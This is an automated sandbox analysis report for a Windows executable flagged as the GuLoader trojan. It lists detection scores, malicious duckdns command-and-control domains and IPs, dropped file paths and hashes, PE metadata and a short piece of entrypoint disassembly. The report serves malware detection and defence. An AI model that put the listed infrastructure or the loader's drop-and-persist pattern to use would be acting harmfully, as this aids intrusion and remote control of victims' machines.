---|---|---|---|---|
79% | ReversingLabs | Win32.Trojan.GuLoader | ||
69% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
79% | ReversingLabs | Win32.Trojan.GuLoader | ||
69% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
6% | Virustotal | Browse | ||
1% | Virustotal | Browse | ||
9% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
10% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
9% | Virustotal | Browse | ||
2% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
2% | Virustotal | Browse | ||
1% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
janbours92harbu04.duckdns.org | 45.74.58.7 | true | true |
| unknown |
simonastolerciuc.ro | 85.120.16.93 | true | false |
| unknown |
janbours92harbu03.duckdns.org | 192.169.69.26 | true | true |
| unknown |
janbours92harbu007.duckdns.org | unknown | unknown | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
true | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false | unknown | |||
false | unknown | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
85.120.16.93 | simonastolerciuc.ro | Romania | 8708 | RCS-RDS73-75DrStaicoviciRO | false | |
192.169.69.26 | janbours92harbu03.duckdns.org | United States | 23033 | WOWUS | true | |
45.74.58.7 | janbours92harbu04.duckdns.org | United States | 3223 | VOXILITYGB | true |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1526565 |
Start date and time: | 2024-10-06 11:44:20 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 15m 52s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301 |
Run name: | Suspected Instruction Hammering |
Number of analysed new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | zR4aIjCuRs.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@17/23@4/3 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.189.173.21
- Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 7872 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description |
---|---|---|
05:47:43 | API Interceptor | |
11:47:05 | Autostart | |
11:47:13 | Autostart |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
85.120.16.93 | Get hash | malicious | Remcos, GuLoader | Browse | ||
192.169.69.26 | Get hash | malicious | VjW0rm, AsyncRAT, RATDispenser | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
janbours92harbu04.duckdns.org | Get hash | malicious | Remcos, GuLoader | Browse |
| |
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
simonastolerciuc.ro | Get hash | malicious | Remcos, GuLoader | Browse |
| |
janbours92harbu03.duckdns.org | Get hash | malicious | Remcos, GuLoader | Browse |
| |
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
VOXILITYGB | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Xmrig | Browse |
| ||
Get hash | malicious | Xmrig | Browse |
| ||
Get hash | malicious | Nanocore, Remcos | Browse |
| ||
WOWUS | Get hash | malicious | Remcos | Browse |
| |
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos, PureLog Stealer | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
RCS-RDS73-75DrStaicoviciRO | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Sality | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Babuk, Djvu | Browse |
| |
Get hash | malicious | Stealc | Browse |
| ||
Get hash | malicious | FormBook, GuLoader | Browse |
| ||
Get hash | malicious | Matanbuchus | Browse |
| ||
Get hash | malicious | FormBook, GuLoader | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | CredGrabber, Meduza Stealer | Browse |
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_6cf0e4ec34412705f7c7679452dd618a68a4ad_6bd5dc59_60d14e17-1202-42d6-adc8-8c198509b060\Report.wer
Download File
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.1871363138655737 |
Encrypted: | false |
SSDEEP: | 192:4AXnW8IMZmPxV2jeTADZGih2nDu76gfAIO84:nm8IMoPxV2je0feDu76gfAIO84 |
MD5: | 9FE7CC2C0A71EC51CCE19AFA6D616E65 |
SHA1: | 9C12B87EB514FD5D2C46AE02B9B669CE80BB4D03 |
SHA-256: | 3ABE4A775DA7B65F8DE48CE9085991FE45E1A603AF580E7F1512D97B109E849E |
SHA-512: | 77EB510A7A8DAAF95F1C1F260B2639981B97E2570D7FC89C8AB171D0CABD1287FDE88A1B4418BFC73B5166AED408F13B7C77EB746321B866831D12E2070FC504 |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_7999b5829bb6649a4591b7178c861d362cefd5f_6bd5dc59_c269668f-8d0f-4b43-9053-87429be6c60a\Report.wer
Download File
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.1867453190313875 |
Encrypted: | false |
SSDEEP: | 192:LGXnW8IM9maQHY7hjeTADZGih2nDu76rfAIO84:im8IMsaQHY7hje0feDu76rfAIO84 |
MD5: | B3FAB23E32E89DA13A581C68F5A5FCD6 |
SHA1: | 6D15A5A17F7EA6C10559E97A33F25D2840360A94 |
SHA-256: | B431C3F4B9830723E202449FA5F0A2DD90819F21521D64E708E664210CD7F514 |
SHA-512: | CC8DAA323817BE8F168F0A28D5A1F4F5F7B3BDEB643FFB37F9A2B20C822CED8E42B4CA535E6AEBEFF84C8119EF486F4631F47BA7E150E82DE4A89A16AA9DA29A |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 161124 |
Entropy (8bit): | 1.8387921709806796 |
Encrypted: | false |
SSDEEP: | 768:1zxue5EnbBcq6n0QOjD+NOk+/JRdMFGtzHyp92E:aBcH4k0JRdMFGtzHyp92E |
MD5: | F9583B5859245B290C5282029473254C |
SHA1: | FBC052D0AA31511EF54B581EBB64794D057D9D2E |
SHA-256: | 788256DC81A0D1114EEBEF1F278A5FD0849BBD28BA79D7925E385F50338CD8D4 |
SHA-512: | 6C1BE077D16FF98931D10BEB3AE7431F8ACA2A4A2B1346C9F938E554B759FE00CE1A618CD5686BAE60518C695424FC80642060821AE7F5D628527C0A0B00EFD1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8328 |
Entropy (8bit): | 3.694297801663072 |
Encrypted: | false |
SSDEEP: | 192:R9l7lZNiUg62x6YqA6whugmfd84rpDa89bhHp8ssfnLm:R9lnNib646YF6whugmfdRNhHp8/fi |
MD5: | 54F2B9C9EE9908EF57183B5C56EF690F |
SHA1: | 8E14C194D4CC74D10E71237F7DE3C0F55269CB01 |
SHA-256: | B1C96D036CAF8EB980E082D67D05D97A86ED298B514605FDBC37C462227CCCB8 |
SHA-512: | 6B10A0699B795D972F4818B9D645B54886EF846B3EA0132D9AB0018098DE78562FC4C21A96BFAD3DD05877B9CB7F55D16A7F37D119672754CE548EFEF7CE9270 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4790 |
Entropy (8bit): | 4.475263691878414 |
Encrypted: | false |
SSDEEP: | 48:cvIwwtl8zsHe702I7VFJ5WS2CfjkKs3rm8M4J5sgFMA+q8AFiEFBd:uILf+7GySPfUJYAOEFBd |
MD5: | 5B686901E1EDD7C024F9ED8C6C4E9247 |
SHA1: | 70C5AFB1CCE6B076728B26C6267F32CB1232EC26 |
SHA-256: | AE56E3C282CE1577AC4BF663C5114DDA694168B2A19E8F43DFF1724FB3E02CDC |
SHA-512: | E95320B743C0DAE2AFCC608F539AE7EB6D7A99BB41855AFA37190BAD420095866113548D2663F8034793D75C9808BFF1FFFB530A634E0444AB6B5F4E0AD6127F |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 171596 |
Entropy (8bit): | 1.8427787355926217 |
Encrypted: | false |
SSDEEP: | 384:X1PykXlkAx5HEncDtxNZ8EWW19q6EcdHLV6KwhURMfVukSI39cwCH5Mou:lBm25EncDtRWW19q6EmpcWafVpNcco |
MD5: | 6E958D1F7B3EC13C0A17871D42615CAE |
SHA1: | B2C927F33CBE13F7400C70C7E76283AB40389FAE |
SHA-256: | DAB463DFC5B0E5C0D9D81A41A58394771C118BAEA3C1C40FF610B9BBE0AC664F |
SHA-512: | F7B58FCD2D00131F14AB147C1A11192FCBE89810620D38FFF57CD015B3AE0784BCD544DB221EA03D7DD8097C788FBE44FE43F464562629201353F9C839CFF372 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8328 |
Entropy (8bit): | 3.691612959534491 |
Encrypted: | false |
SSDEEP: | 192:R9l7lZNiUsA6K6YqE6WIgmfxUND4rpr+89bZHp8ssfQzm:R9lnNiI6K6YB6WIgmfxUNERZHp8/f5 |
MD5: | C97F29F1ACA94D773B5DAA02D35D2495 |
SHA1: | ACC241BA2330C459F5099963887A6900907F9FA4 |
SHA-256: | 8CE63F6A2BBA85A09E458B4E14FC473F5ADB1BAA47DFF9F8467E7BBD70AA9E54 |
SHA-512: | 2C8371E4DC28F05A1DA8944A07CE2700018DEDBA64C3B9E46B48E1A7EE62A7DE4E1A9372C95CC724C5E51F97656DDB563876E0BDD156795A8D3977B0D258C5E4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4790 |
Entropy (8bit): | 4.4760910562810805 |
Encrypted: | false |
SSDEEP: | 48:cvIwwtl8zsae702I7VFJ5WS2CfjkSPms3rm8M4J5ssFfo+q8AZiEFBd:uILf/7GySPfJP5JXoqEFBd |
MD5: | 4C2F6824FFE5FF9154BFB840F4FFEAFF |
SHA1: | C60042F6849B8D2D921D1B859745B99559CAC0E0 |
SHA-256: | 8EE4F9C8FDE8796C4B16AFACFBB672C89B795B79A5416FC14B0195F6733FB402 |
SHA-512: | 9920DF95BCD891D372827DB6B1CB0BEDCC0B278FE50C1A17D9AB85F007AF0DE67A686C948D40611DB7F03D94A573CAE1A42F646E02F6220D6241A7E1A38AF3B5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 242 |
Entropy (8bit): | 3.3605062470053775 |
Encrypted: | false |
SSDEEP: | 6:6lJ8DS0Cb5YcIeeDAlMlJ8DS0NwR1SlJ8DS8FIbWAv:6lJ8yDecmlJ8ZlJ8PIbW+ |
MD5: | D720B019BE1F03C97E325758BE4EAF08 |
SHA1: | 48083EE3F2769F3C87EB2CDC4D6EEA58410EB50A |
SHA-256: | FC04BF73CBA8E072D6DB3C49C194A73B4D27334A28E375944B144B6D5CD31F30 |
SHA-512: | B9408A84D190F9031E58CF29D1AA628F0D2EBF6A16A61FBA6D8587B882752DADC7DC775F49ACE4FF5004DBE18B31E35151A525AF0CE4A4EA9D4B07220BCA1A98 |
Malicious: | true |
Yara Hits: |
|
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 14744 |
Entropy (8bit): | 4.990428309401091 |
Encrypted: | false |
SSDEEP: | 384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdB4NXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdB4NZiA |
MD5: | A3F4A4CED5E4717EA59EEDAAA642F0CF |
SHA1: | EB40B4929869C8C2A8866A0F06AE166F406FE493 |
SHA-256: | 59B8E05483EA0D66C8F98CB27508791C4066743462559CE29BBF658DD88BEC0E |
SHA-512: | 804565218357E45BBFEE9661AF75E9941B54E1B6AA656DE02E57A0842BCA8E679F2250E004B4FF7705F4A22C65F9A3A48AF9614A851D8C062DF4DA3B99A67257 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\zR4aIjCuRs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 78853 |
Entropy (8bit): | 1.2455837622809836 |
Encrypted: | false |
SSDEEP: | 384:3xbi0gBtJQNRoJSzCkwEtgPy35L11XkHfhbW+gi9XXtdj+3IPEk3RewnMpvVGukp:3xbirBtJQN6JR+3t11XkZKU9XPELtkp |
MD5: | 824141132C7447FD5FEFE32B734E91EE |
SHA1: | 84631EE3FEE81D126E8129AB3E837DB105912176 |
SHA-256: | 8C86022F0ED34AA823A873EEA842DB85411C0A5FFC75E9A0B3F9F045471FA838 |
SHA-512: | EE4BAEEC6921AB62DA9BAFD5C75276117736F8741F74936E4CEE9CFA18F47BE0D6777B3D3F9269A2E3383AAFF858B4513B69A1007E5E11B1AEB8FCEFE651440D |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\zR4aIjCuRs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 54283 |
Entropy (8bit): | 5.361679605378956 |
Encrypted: | false |
SSDEEP: | 1536:oh9f0RLFjL+EcdjZ1vLuUX6o+tGsxj4wiInD8DeFW:ohIdC5ki6HqELW |
MD5: | B8754D46031D79E381032DC495738F37 |
SHA1: | C1DFA31255DC6D514D03A4A78DFEFC38AC79F291 |
SHA-256: | 0AA4DFFDFDF131923B9559FADBF0CBC382C60AF309C4E075151FD73828BA631B |
SHA-512: | C7C30FD11D98B97371B0848134FF3A44758F8E3AB3E33BDA6DA18D0988A3DE56A30E80720B4C37E7878EDB672B43B7BDB2C3E0464ECA48F23A9C7F3493C8F396 |
Malicious: | true |
Preview: |
Process: | C:\Users\user\Desktop\zR4aIjCuRs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 384624 |
Entropy (8bit): | 1.248833521425474 |
Encrypted: | false |
SSDEEP: | 1536:W6cz0sUWiVbCEoc9wgvpThh7bVWBYRM1XQpOD:cIzpxHvphhVWBCw8OD |
MD5: | 9B6ACDA0C5F46046E385C0790128D0C2 |
SHA1: | 6BD58E2F72155950922FFC3C834569C4170A19CB |
SHA-256: | 0A8A0437AE28DB331634876CE10D4CD83282F8F157C88D4AC91BBFC7102AC727 |
SHA-512: | 028F16C856B926C9BAC6569F6EED0EE943CC9522B6301930DDC571E2314F11955D79FEA2B64DE3A332BC99A165A9FD81A97E2F216F3B5F5DBF19719159D2B142 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Klitoriser51.adm
Download File
Process: | C:\Users\user\Desktop\zR4aIjCuRs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 129475 |
Entropy (8bit): | 1.2572241713566128 |
Encrypted: | false |
SSDEEP: | 768:8NDyIGIJQJn7z1buGQfGc5yItzeF6/57P6lkcjp1lhlOh/6fCT3:HJ7u9aVf0Jx3 |
MD5: | 438EC0B53BC58AFA50B6C67950DF66D3 |
SHA1: | 39BC09893AE86854F4A9204D5E75CF02A8B7E8FF |
SHA-256: | E89BFD83D25FD03FDBA5D94B3D2E7F3A06F3EEA6D538FD397EBAFF4252EAE941 |
SHA-512: | 195A2BDAA2F6D1B8C1E4B7ED5856D26818B8B142688EE33CB245084938F56D7E08930194D7CD15BCDE0BB8956CF0A15C34E05ADA06C25EEA98D6FC9250CB966B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Loquaciousness.Acc
Download File
Process: | C:\Users\user\Desktop\zR4aIjCuRs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 313594 |
Entropy (8bit): | 7.718949917493243 |
Encrypted: | false |
SSDEEP: | 6144:dVhXa+OFcyNokRx6hV+eIskuCQvw8c1SE1lZkhyE3AAcYtK7CNxXf0f8DEWktAb0:RDkRxShL/usE1nyy+WCN2f9htAFHlRm |
MD5: | B94F573B2BD801105D4A2F06933D5770 |
SHA1: | FEEA08423EE946072A97F702B633623C605CA03D |
SHA-256: | 2CDB0341A8A218F53C689CB81512C87B11E71E56D2E4709EDBBCEB2A81B5D5C4 |
SHA-512: | C90549B027A0105D8376232C71E7897B6581079254B026748EC640D38CA165BEE1DB6FDD35702489A0555FC864A4887ADBD2B4C7A057B07D9913FF10CBC1296C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\gangsterfilmen.sky
Download File
Process: | C:\Users\user\Desktop\zR4aIjCuRs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 209545 |
Entropy (8bit): | 1.2697940266141337 |
Encrypted: | false |
SSDEEP: | 768:GB9fz0i3eSF6qok2kiuGuccV7/BZWgd1LadtY5w7PJsQpEINlaiBVtM6F8+AXF6N:14sJhOhiKT6vV |
MD5: | AD805DD3CCD4E51E794B31FECB308E37 |
SHA1: | 60A468E13054100E7171AC9EBCFC6ACC11ECEFE4 |
SHA-256: | C23B6450A4D80F70F25449D74B945A1B889CAEDE1881359A1A4934AC2C947D0F |
SHA-512: | ECCCA66ED902438B2EC4B9AD16C0A0EBC6DD1287817714CD7B1C4222B2FE17746D167327AB445CEA38D6C15ECA66ADDE913698AFAD999C7D17CA67B037F7BC7F |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\zR4aIjCuRs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 163471 |
Entropy (8bit): | 1.2547111118094014 |
Encrypted: | false |
SSDEEP: | 768:Xyj8YpMGWHC57RDcZ3RcixTn9scZB+eTEHlhv9T6j+XbGkO/1eu5qV5D0jB43:Xr+eZwITkqq29 |
MD5: | 76003043201C6410C1D4B56A1357B6DF |
SHA1: | 43BD7B9D6BFD3354C40358847994BA8B241F7252 |
SHA-256: | 387143B793C16EF84FF29AEF4D62E252ADCC59EADC3912800BF1118013392BFA |
SHA-512: | C180C254C16B7FF4D27D1823F49D8830A8E6FC24FC49366605433521FF10A7DB5A056A12C9576738973E8089813616FE899AE88F46CE10C4AB54E9C2DCDA5374 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 776478 |
Entropy (8bit): | 7.022322453988849 |
Encrypted: | false |
SSDEEP: | 12288:HQIoWuLS5jMYG1kqqGDFL34Od2l2QrClyxzwsNZU18Do9I4jMSPM:H7uLS5jtGTDFoOd2YQIyZfZ74jvM |
MD5: | 02F086FB54D58BF17B51564B34166F5E |
SHA1: | 6AD69C9BDAFB1A4CA5C0D15836B3E0ABDD0A1E62 |
SHA-256: | 2AC935868A1F972E5A036986147051402E1B656A5AC9AC4B8CA15252F14E15FD |
SHA-512: | D34CEB0A5835C88F3D10A3E2E31F0E91A71809C5C514A1D2573C5A126E51F5BD4EF1F4F41B166F468D2222B6D0ABF04871109A3450F039EB4A577B9067C02AFA |
Malicious: | true |
Antivirus: |
|
Preview: |
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exe:Zone.Identifier
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | true |
Preview: |
File type: | |
Entropy (8bit): | 7.022322453988849 |
TrID: |
|
File name: | zR4aIjCuRs.exe |
File size: | 776'478 bytes |
MD5: | 02f086fb54d58bf17b51564b34166f5e |
SHA1: | 6ad69c9bdafb1a4ca5c0d15836b3e0abdd0a1e62 |
SHA256: | 2ac935868a1f972e5a036986147051402e1b656a5ac9ac4b8ca15252f14e15fd |
SHA512: | d34ceb0a5835c88f3d10a3e2e31f0e91a71809c5c514a1d2573c5a126e51f5bd4ef1f4f41b166f468d2222b6d0abf04871109a3450f039eb4a577b9067c02afa |
SSDEEP: | 12288:HQIoWuLS5jMYG1kqqGDFL34Od2l2QrClyxzwsNZU18Do9I4jMSPM:H7uLS5jtGTDFoOd2YQIyZfZ74jvM |
TLSH: | F9F412003AC0CC23DDA10A749DA7C7EA6B786E54AC05DB477704BF4E78773D36A1AA91 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...<.oZ.................h......... |
Icon Hash: | 5cf87c6c5d460252 |
Entrypoint: | 0x40338f |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x5A6FED3C [Tue Jan 30 03:57:48 2018 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | b34f154ec913d2d2c435cbd644e91687 |
Instruction |
---|
sub esp, 000002D4h |
push ebx |
push esi |
push edi |
push 00000020h |
pop edi |
xor ebx, ebx |
push 00008001h |
mov dword ptr [esp+14h], ebx |
mov dword ptr [esp+10h], 0040A2E0h |
mov dword ptr [esp+1Ch], ebx |
call dword ptr [004080A8h] |
call dword ptr [004080A4h] |
and eax, BFFFFFFFh |
cmp ax, 00000006h |
mov dword ptr [00434EECh], eax |
je 00007F86EC51FC63h |
push ebx |
call 00007F86EC522F15h |
cmp eax, ebx |
je 00007F86EC51FC59h |
push 00000C00h |
